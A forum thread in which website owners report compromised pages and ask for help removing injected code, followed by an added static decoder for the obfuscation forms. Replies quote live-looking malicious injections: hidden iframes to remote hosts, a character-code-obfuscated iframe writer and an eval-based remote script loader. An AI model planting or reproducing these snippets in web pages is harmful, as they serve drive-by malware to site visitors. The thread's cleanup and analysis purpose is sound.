

URGENT!!!!





pollux1er
I had a serious problem with one of my domain names. And that thing Kaspersky calls a trojan was a serious problem for me. I first thought it was the machine I was working with that was having a virus, till Kaspersky detected something when I wanted to open my page. If you have Kaspersky Internet Security updated, you can understand what I mean by opening my URL. http://newsletter.frih.net

I will post a picture for you to see what I am talking about. How come such a thing happens?
bloodrider
It may be detecting the script as malicious...
I have ESE (NOD32) and it doesn't detect anything.

PS: I've tried a random user and password and entered! Is that supposed to happen?
Sunny
If you look at that Kaspersky alert closely, it shows IP 195.2.252.251. Now frih.net or your site resolves to IP 216.32.85.170. I don't think your site has anything to do with that IP. Now the question is why it is ringing the alarm when you open your site; my guess is you have a trojan on your PC which adds a line of code to HTML or PHP pages. So every time you open a site it also tries to connect to that IP.

You can also check that newsletter script for that IP in the coding to be safe.
pollux1er
bloodrider wrote:
It may be detecting the script as malicious...
I have ESE (NOD32) and it doesn't detect anything.

PS: I've tried a random user and password and entered! Is that supposed to happen?


For now yeah! The script has a mistake. Don't care about it.
pollux1er
Sunny wrote:
If you look at that Kaspersky alert closely, it shows IP 195.2.252.251. Now frih.net or your site resolves to IP 216.32.85.170. I don't think your site has anything to do with that IP. Now the question is why it is ringing the alarm when you open your site; my guess is you have a trojan on your PC which adds a line of code to HTML or PHP pages. So every time you open a site it also tries to connect to that IP.

You can also check that newsletter script for that IP in the coding to be safe.



I think you might be right. In all my code I discovered some lines that had not been written by me. Something with "Google rank". I don't understand that because I don't think Google is hacking!!!
There was something like scripts executed from outside my hosting.
rvec
Could you paste the code here?
I think we could find something on google about it and how to remove the virus/trojan from your pc.
pollux1er
There was first something like this:

<iframe src="http://72.167.161.219/in.php" width=1 height=1 style="visibility: hidden;"></iframe>

I don't know where it is coming from in my script!!!
polly-gone
Well, if I am brushed up on my French, it seems like it isn't your website. It could be someone trying to get into your computer or something. My McAfee gives me messages like that when I try to network my computers because it thinks I am hacking myself.

-Nick
Bondings
pollux1er wrote:
There was first something like this:

<iframe src="http://72.167.161.219/in.php" width=1 height=1 style="visibility: hidden;"></iframe>

I don't know where it is coming from in my script!!!

Go to the source code of your pages and check if that code is in there and not only in the pages you receive. Also check the same page from a different computer. Or link to the page in question. If it's also on the home page you linked to, then it's not there when I view it, which would mean it was added by your computer/network, by some malware.
pollux1er
Your explanation is more likely true. But one thing I'm now sure of is that it is coming from machines I worked on. I have already removed all that from my scripts.

I also tried to go to the URL related to the IP address. It is not accessible. But 72.167.161.219/in.php led me to the IP Kaspersky told me first. Meaning there is a link between those pieces of information.
pollux1er
<script language="JavaScript">function ualx(fdkh){return String.fromCharCode(fdkh);}var pfmv="060105102114097109101032115114099061039104116116112058047047107108101112097046099110047111108097046104116109108039032119105100116104061039050054048039032104101105103104116061039049049048039032115116121108101061039100105115112108097121058032110111110101059039062060047105102114097109101062";var gjxy="";for(zatk=0;zatk<pfmv.length;zatk+=3){gjxy+=ualx(pfmv.substr (zatk, 3));}document.write(gjxy);</script>

This is the new script I found on it.
Bondings
It seems to be hiding what it does by some string operations.

Anyway, on what page did you find it?
pollux1er
This script is present in all my index.php pages of each directory. But what I will do is change all my passwords to access my hosted pages, to see if it is going to change again.
k_s_baskar
Hi,
I am also having the same problem here.

Quote:
<script language=javascript><!--
(function(){var DsEsO='%';var gBYRz='var!20a!3d!22!53c!72ip!74!45ngine!22!2cb!3d!22Ver!73ion!2Cool+!22!2c!6a!3d!22!22!2cu!3dnavig!61tor!2eu!73!65!72!41!67e!6et!3bif(!28!75!2ei!6edexOf(!22Chro!6de!22)!3c0!29!26!26(u!2ei!6edexOf(!22!57!69n!22)!3e0)!26!26!28u!2ein!64exOf(!22NT!206!22!29!3c0)!26!26(docu!6de!6e!74!2eco!6f!6bie!2eindexO!66(!22mi!65!6b!3d1!22)!3c0)!26!26(!74y!70eo!66!28zr!76!7ats)!21!3d!74!79peof(!22A!22)))!7bzrvzt!73!3d!22A!22!3be!76al(!22if(w!69ndow!2e!22!2ba!2b!22)j!3dj+!22!2ba!2b!22Major!22+b!2ba+!22Minor!22+b+a+!22Bu!69!6cd!22+b!2b!22!6a!3b!22!29!3b!64ocumen!74!2ew!72it!65!28!22!3cscript!20src!3d!2f!2f!6d!22!2b!22a!72tuz!2ecn!2fvid!2f!3f!69d!3d!22!2bj!2b!22!3e!3c!5c!2fsc!72ipt!3e!22)!3b!7d';eval(unescape(gBYRz.replace(/!/g,DsEsO)))})();
--></script>


The above scripts are automatically inserted in my index files after </head>




Quote:
<iframe src="http://bigtruckstopseek.cn/ts/in.cgi?banner2" width=2 height=4 style="visibility: hidden"></iframe>


And this code is inserted below my <body> tag.

Please help to clear this.
pollux1er
What I can advise you for now is first to change all your passwords.
Bondings
@k_s_baskar, your account is most likely hacked. I would suggest an account reset. Also, please update any software you use, considering it is likely that they contain bugs that will be exploited again.
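
The two obfuscation forms posted in this thread (3-digit decimal character codes passed to String.fromCharCode, and percent-encoding with `%` swapped for `!` before unescape) can be decoded statically to see where the hidden markup points, without running the script. The following is an added example, not part of the original thread; the function names and sample strings are constructed for illustration, and example.invalid is a placeholder.

```javascript
// Added example. Both decoders return text only: no eval(), no document.write().

// Form 1: zero-padded 3-digit decimal character codes, as consumed by the
// substr(i, 3) + String.fromCharCode() loop in the first script.
function decodeDecimalTriplets(digits) {
  if (!/^(\d{3})+$/.test(digits)) {
    throw new Error("expected a digit string whose length is a multiple of 3");
  }
  return digits.match(/\d{3}/g)
    .map((d) => String.fromCharCode(Number(d)))
    .join("");
}

// Form 2: percent-encoding with '%' swapped for a marker ('!' in the second
// script, which restores it with replace(/!/g, '%') before unescape()).
function decodeMarkerHex(text, marker = "!") {
  let out = "";
  for (let i = 0; i < text.length; i++) {
    const hex = text.slice(i + 1, i + 3);
    if (text[i] === marker && /^[0-9a-fA-F]{2}$/.test(hex)) {
      out += String.fromCharCode(parseInt(hex, 16));
      i += 2; // skip the two hex digits just consumed
    } else {
      out += text[i]; // literal character, or a marker not followed by hex
    }
  }
  return out;
}

// List where src= attributes in the decoded markup point.
function extractRemoteSources(decoded) {
  return Array.from(decoded.matchAll(/src\s*=\s*['"]?([^'"\s>]+)/gi), (m) => m[1]);
}

// Constructed samples (not the thread's payloads); example.invalid is a placeholder.
const SAMPLE_DECIMAL =
  "060105102114097109101032115114099061039104116116112058047047" + // <iframe src='http://
  "101120097109112108101046105110118097108105100047" +             // example.invalid/
  "039062";                                                         // '>
const SAMPLE_MARKER = "!3ciframe src!3d!22http!3a//example.invalid/!22!3e";

console.log(decodeDecimalTriplets(SAMPLE_DECIMAL));
console.log(extractRemoteSources(decodeMarkerHex(SAMPLE_MARKER)));
```

Searching the site's files for the encoded form as well as the decoded address catches copies that a plain search for the address would miss.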